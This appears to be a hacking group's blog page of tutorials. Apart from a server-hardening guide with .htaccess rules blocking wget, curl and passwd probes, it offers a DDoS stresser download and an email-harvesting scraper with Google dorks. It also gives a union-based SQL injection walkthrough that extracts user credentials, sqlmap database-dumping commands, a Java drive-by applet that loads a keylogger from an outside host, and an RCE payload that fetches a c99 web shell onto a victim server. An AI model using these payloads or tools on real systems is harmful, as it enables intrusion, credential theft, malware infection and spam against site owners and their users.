We offer private theme from CS32.RO/forum is a beautiful theme for gaming, elegance. It can be used only for phpBB.
Demo : http://cs32.ro/forum
MHC Stresser Source
StandardDownload https://www.sendspace.com/file/sqcdej
Do not give other information about this stresser (I’m not good at it).
//I’ll come back with a tutorial that will explain in detail how to use, how do get the boot as DDoS give
Security apache2 , mysql and php
Standardsecurity php,mysql,apache2
//
Just distributions of Debian.
//THIS TUTORIAL IS ONLY PART.
This tutorial is in addition to the tutorial “https://psgcenter.wordpress.com/2014/08/10/how-to-create-your-own-linux-server-hosting/” .
Let’s start.
1.
Type
nano /etc/apache2/apache2.conf
Added at the end like this:
ServerSignature Off ServerTokens Prod
After that add:
<Directory /var/www/html> Options -Indexes </Directory>
In the same file we add:
Options -FollowSymLinks
Let’s get to Mysql
Type
nano /etc/mysql/my.cnf
Added at the end
set-variable=local-infile=0
Now to PHP
Type
rm /etc/php5/sqlite3.ini
Dam to disable dangerous functions:
disable_functions =exec,passthru,shell_exec,system,proc_open,popen,c url_exec,curl_multi_exec,parse_ini_file,show_sourc e
Anti backdooring :
nano /etc/php5/security.ini
and add
cgi.force_redirect=On
Now go in / var / www and create an htaccess file and add this in it: (SQL injection and XSS is anti)
ServerSignature Off
Options -Indexes
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK|DEBUG) [NC]
RewriteRule ^(.*)$ - [F,L]
RewriteCond %{HTTP_USER_AGENT} (libwww-perl|wget|python|nikto|curl|scan|java|winhttp|clsh ttp|loader) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (;|<|>|'|"|\)|\(|%0A|%0D|%22|%27|%28|%3C|%3E|%00). *(libwwwperl|wget|python|nikto|curl|scan|java|winh ttp|HTTrack|clshttp|archiver|loader|email|harvest| extract|grab|miner[.completati cu alte scannere......]) [NC,OR]
RewriteCond %{THE_REQUEST} \?\ HTTP/ [NC,OR]
RewriteCond %{THE_REQUEST} \/\*\ HTTP/ [NC,OR]
RewriteCond %{THE_REQUEST} etc/passwd [NC,OR]
RewriteCond %{THE_REQUEST} cgi-bin [NC,OR]
RewriteCond %{THE_REQUEST} (%0A|%0D) [NC,OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR]
RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR]
RewriteCond %{QUERY_STRING} (\.\./|\.\.) [OR]
RewriteCond %{QUERY_STRING} ftp\: [NC,OR]
RewriteCond %{QUERY_STRING} http\: [NC,OR]
RewriteCond %{QUERY_STRING} https\: [NC,OR]
RewriteCond %{QUERY_STRING} \=\|w\| [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]
RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>).* [NC,OR]
RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR]
RewriteCond %{QUERY_STRING} (\./|\../|\.../)+(motd|etc|bin) [NC,OR]
RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR]
RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR]
RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR]
RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR]
RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR]
RewriteCond %{QUERY_STRING} (;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|drop|delete|update|cast|cre ate|char|convert|alter|declare|order|script|set|md 5|benchmark|encode) [NC,OR]
RewriteCond %{QUERY_STRING} (sp_executesql) [NC]
RewriteRule ^(.*)$ - [F,L]
[POST]SQL injection with Live HTTP Headers
StandardDownload :
Mozilla Firefox : https://addons.mozilla.org/ro/firefox/addon/live-http-headers/
Google Chrome : https://chrome.google.com/webstore/detail/live-http-headers/iaiioopjkcekapmldfgbebdclcnpgnlo
Suppose we have a site that we want to test if we login and e sqli vulnerable.
The site will look like
Username :
Pasword :
Click for finish
Writing to a random username and password the same. But do not give the “Click for finish” enter the menu of Mozilla Firefox-> Tools-> Live HTTP Headers-> tick Capture.
Now press the button “Click for finish” .
Now we look at the live http headers and see what has captured and somewhere in the middle or a susu pages to find a parameter like “username = random & pass = random & id = 2″. Please click on this parameter and press Replay bottom left.
Now try to see who is vulnerable by putting the sign ‘ at the end values of the parameters.
And we see that id = 2 is vulnerable because we display a MySQL error.
E-mail scanner by PSGcenter
StandardScreens
http://i.imgur.com/AUhCXzo.png
http://i.imgur.com/s8KUKsr.png
Virustotal :
Download :
https://www.sendspace.com/file/djojtk
What is this program?
Well, he out emails from web sites.
How we find sites to be extracted?
Simply follow the down pages Method # 1 both are private.
Instructions for the program:
Going into it we click the E-mail Scanner. Please click the “…” button next to Status: Idle
txt file then choose the sites and give home and he will automatically scan. We also have a button to add
proxy surfing unsure if we believe those sites. We Save button saves the emails he txt list
in a txt emails.txt that you find in your directory.
I with this program and no method #1 I pulled in 5 minutes in 10 sites about 48,000 emails.
Method #1
Going on google write this:
filetype:sql
And all the sites that we find a file with the extension .sql add to that txt file with websites
If you want a particular country as we proceed? Let’s say that we do so in Italy
Going on google write this:
site:.it filetype:sql
that says site .it write extension sites in the country that we want to extract (.it=italia)
I have a method that extract just as quick to get back with her in a few days.
Tool by PSGcenter.wordpress.com
Unzip in linux terminal.
Standard– archive .tar
tar -xvf name archive.tar
– archive.tar.gz / .tar.gz2
tar -xzvf name archive.tar.gz
– archive .tar.bz2
tar -xjvf name archive.tar.bz2
– archive .zip
unzip name archive.zip
– archive ,rar
unrar e name archive.rar /
[Leason 1]SQL Injection – Union based
Standard
“The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database.”
Background Information
- It is considered the most common web vulnerability today
- It’s a flaw in the web application–not the db, or the server
- Can be injected into: Cookies, Forms, and URL parameters
Lesson Facts
- This lesson uses MySQL syntax for all examples.
- This lesson does not provide reasons for why sites are vulnerable, simply how to exploit them
- This lesson only provides sql injection examples for url parameters such it is such a large subject on it’s own
- This lesson gives small examples of filter evasion techniques
The Lesson
Some commands you will need to know:
‘union all select’ : combines two or more select statements into one query and returns all rows
‘order by’ : used to sort rows after a select statement is executed
‘load_file()’ : loads a local file from the site or server examples would be .htaccess or /etc/passwd
‘char()’ : used to change decimal ascii to strings, can be used for filter evasion–in sql injections, used in conjunction with load_file
‘concat()’ : combines more than one column into a single column, enabling more columns to be selected than the number that are showing on the page (You will understand better later)
‘—’ : a comment
‘/*’ : another type of comment
Injection SQL Queries into URL Parameters
So you’ve found a site: ‘
and want to test if it’s vulnerable to SQL Injections. Begin by checking if you can execute some of your own queries, so try:
/index.php?id=5 and 1=0–
If after executing the above statement, nothing has happened and the page has remained the same, you can try:
/index.php?id=’
If neither of those work, for the purposes of this tutorial move on to another site. Otherwise, if a blank page showed up you just might be in luck!
Now we want to find how many columns and which ones are showing when the select statement is executed so we use:
/index.php?id=5 order by 20
If you get an error decrement the number 20, if there is no error continue incrementing until you get one and then the number just before your error is the number of columns in the table you’re selecting from.
Example:
/index.php?id=5 order by 15 <–returns no error, but /index.php?id=5 order by 16
returns an error, then we know that there are 15 columns in our select statement.
The next statement will null the id=5 so the script only executes our commands and not it’s own, and show us which columns we can extract data from:
/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15–
The comment comments out anything the script would append to the end of the statement so that only our statement is looked at.
So now look at the page and if you see any of the numbers you just typed in, you know those columns are showing, and we can gather information from them. For this example let’s pretend columns 5, 7, and 9 are showing.
Now we can begin gathering information!
/index.php?id=null union all select 1,2,3,4,user(),6,database(),8,version(),10,11,12,1 3,14,15–
As you can see we selected values from the showing columns, what if we want to clean this up a bit, and put all of those selected values in one column? This is where concat() comes in:
/index.php?id=null union all select 1,2,3,4,concat(user(),char(58),database(),char(58) ,version()),6,7,8,9,10,11,12,13,14,15–
Now look at your page, user(), database(), and version() are all in one place, and are separated by a colon this demonstrates the use of concat() and char().
The user() will usually give something like username@localhost, but you may get lucky and get username@ipaddresshere, in this instance you can try to brute force the FTP login. The version would help you look up exploits for that version of the database() in use–but only if you’re a skiddy!
Before we can check if we have load_file perms, we must get an FPD (Full Path Disclosure) so we know exactly where the files are located that we’re trying to open. Below are some methods to get an FPD:
/index.php?id[]=
You could attempt to Google the full path of the site by trying something like “/home/sitename” and hoping that you’ll find something in Google
Session Cookie Trick
Thanks to haZed at enigmagroup.org. In the url type:
‘java script:void(document.cookie=”PHPSESSID=”);’
This will give a session_start() error and an FPD.
Now we will attempt to use load_file(), this example will load the .htaccess file, make sure you know the file you’re trying to load actually exists or you may miss out on your opportunity to realize what great perms you have:
/index.php?id=null union all select 1,2,3,4,load_file(char(47, 104, 111, 109, 101, 47, 115, 105, 116, 101, 110, 97, 109, 101, 47, 100, 105, 114, 47, 97, 108, 108, 111, 102, 116, 104, 105, 115, 105, 115, 102, 114, 111, 109, 111, 117, 114, 102, 112, 100, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115)),6,7,8,9,10,11,12,13,14,15–
If you see the .htaccess file, congrats! You have load_file() perms. Now try to load include files such as config.inc.php for database usernames and passwords, hoping that the admin is dumb enough to use the same username and password for ftp. Another idea would be to load .htpasswd after finding it’s location from .htaccess and then logging in to all the password-protected areas that you want to on the site.
If you don’t see the .htaccess file, I will include one more way to extract info by using sql injections.
Using information_schema.tables
So you don’t have load_file() perms? No problem, we can check for information_schema.tables.
1) ‘table_name’ is the name of a table that exists in all information_schema tables on every site:
/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables–
If the site is showing information_schema.tables, the words ‘CHARACTER_SETS’ will appear in column 5. What can I do with CHARACTER_SETS you might be wondering. Well, nothing that I’m going to show you, but you can find out other tables that exist on the site. The information_schema.tables contains a list of every table in the database on the site, so you can pull up the table username and maybe password if they exist…Then what do you think the information_schema.columns hold? That’s right, a list of all the columns on the site. So rather than using just the above injection you could try any of the following:
-/index.php?id=null union all select 1,2,3,4,distinct table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables—
Selects all ‘distinct’ table names from information_schema.tables, meaning it will print out all tables at one time
-/index.php?id=null union all select 1,2,3,4,concat(table_name,char(58),column_name),6, 7,8,9,10,11,12,13,14,15 from information_schema.columns—
Selects all tables and columns that go with each table seperated by a colon
2) If none of the above queries give you anything except for ‘CHARACTER_SETS’ you will have to use enumeration to determine the names of the other tables:
/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_name != “CHARACTER_SETS”–
Then it would show the next table in line so you would modify the above to say:
where table_name != “CHARACTER_SETS” and table_name != “nexttableinline”–
Until no more tables show, then you can do the same for the columns.
3) Now after you’ve executed one or all of those statements, let’s say you found the table ‘users’ and it has the columns ‘username’, ‘password’, ‘id’, and ’email’. To extract that info from the table, use:
/index.php?id=null union all select 1,2,3,4,concat(username, char(58), password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users–
And you’ll get the info you requested, of course you can modify that as you like such as:
-/index.php?id=null union all select 1,2,3,4,username,6,password,8,9,10,11,12,13,14,15 from users where id=1–
-/index.php?id=null union all select 1,2,3,4,concat(password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users where username=’Admin’
Replacing Admin with the top user’s name such as admin or owner etc..
Final Tips
With any luck, one of these methods has worked for you and you were able to accomplish your goal. However, if none of them worked, you can start guessing common table names and then columns:
/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from users
If the page shows up, you know the table exists and you can start guessing column names:
/index.php?id=null union all select 1,2,3,4,username,6,7,8,9,10,11,12,13,14,15 from users
If you get a username, good job you guessed a correct table and column, otherwise keep guessing.
How to setup and use sqlmap.py
Standard———————————————————————————————————————————-
P.S : Need python .
First time to download:
https://codeload.github.com/sqlmapproject/sqlmap/legacy.tar.gz/master
Now unzip
tar zxvf sqlmapproject-sqlmap-0.9-3629-g658110e.tar
———————————————————————————————————————————-
Now to show you how a SQL exploit him.
But first what are the advantages of this tool?
[+] Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB
[+] Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
[+] Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
[+] Support to enumerate users, password hashes, privileges, roles, databases, tables and columns
[+] Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
[+] Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
[+] Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
[+] Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
[+] Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server
[+] Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
[+] Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.
[+] IS FULLY FREE
1. Get DB’s
python sqlmap.py -u http://www.site.com/section.php?id=51 --dbs
2. Now dump tables from database use this command
To me if you see step 1 database called “bazadedate” and from there I extract (no extract from information_schema) [Replace ‘bazadedate “what you want to remove the database tables]
python sqlmap.py -u http://www.site.com/section.php?id=51 --tables -D bazadedate
3.Now suppose we removed the tables and there tabelu “users” and we want to remove columns from it
python sqlmap.py -u http://www.site.com/section.php?id=51 --columns -D bazadedate -T table
Replace “bazadedate” database from which we extract
Replace table with tabelu of which we want to remove columns.
4.TO Assume that we removed these columns:
id
email
password
How to get data from them?
Folosim aceasta sintaxa :
python sqlmap.py -u http://www.site.com/section.php?id=51 --dump -D bazadedate -T users
Replace database database from which we extract
Replace users with tabelu of which we want to remove columns.
[B][I][U]Tutorial for Hackyard.NET PSGcenter.wordpress.com [/U][/I][/B]
How to create a Java Drive By on any site
StandardToday I will show you how to do java drive by.
What is java drive by ?
AnswerA Java Drive-By is a Java Applet that is coded in Java and is put on a website. Once you click “Run” on the pop-up, it will download a program off the internet. This program can be a virus or even a simple…
What do we need?
Brain ; webhosting ( 000webhost is free) ; source ;winscp or filezilla ;
First to go on 000webhost we record and we created a subdomain (Only do this for example, I can add to what you want and what hosting site you want)
Go to Cpanel and edit the site, preferably using FileZilla, you can connect by the FTP details.
Select the files for the chosen JDB
now go in ftp and edit index.php /index.html and add this line
<applet name=’Please run to continue’ width=’1′ height=’1′ code=’taipans.class’ archive=’java.jar’><param name=”funtime” value=”LINK YOUR VIRUS”></applet>
Add link for your keylogger on tag value=”LINKYOURVIRUS” -> VALUE=”Http://myvirus.com/asd.exe”
Add this in your ftp http://ge.tt/2lK9LTe/v/0
Now go to spread site .
//Tutorial created for “PSGcenter.wordpress.com” and “HackyArd.NET” .
[RCE]Remote Code Execution tutorial
StandardHow to find RCE :
RCE most commonly happens via unsanitized input on a website input,
What can we do with this vulnerability?
We can execute any PHP code. Only common tags must start with <? Php and ended with?> Because it already, we insert Codu Only such phpinfo ();
We next vulnerable site: [Vulnerable parameter is multies]
http://mysite.com/includes/functions.php?multies=
As we proceed to show phpinfo. Add phpinfo (); after multies = and see the phpinfo showed us.
http://mysite.com/includes/functions.php?multies=phpinfo();
It no longer than ogramada other php functions and directly explain how is upload shell. Put the following code after multies=
file_put_contents('shell.php',file_get_contents('http://www.c99txt.net/s/c99.txt'));
Okay, the shell is uploaded.
How we see the shell?
Simple, if you notice in our office says that introduce “shell.php” and RCE is folderu includes the scriptu functions.php so shell will be in:
http://mysite.com/includes/shell.php
Tutorial created PSGcenter.wordpress.com and hackyard.net
Professional Security Group 
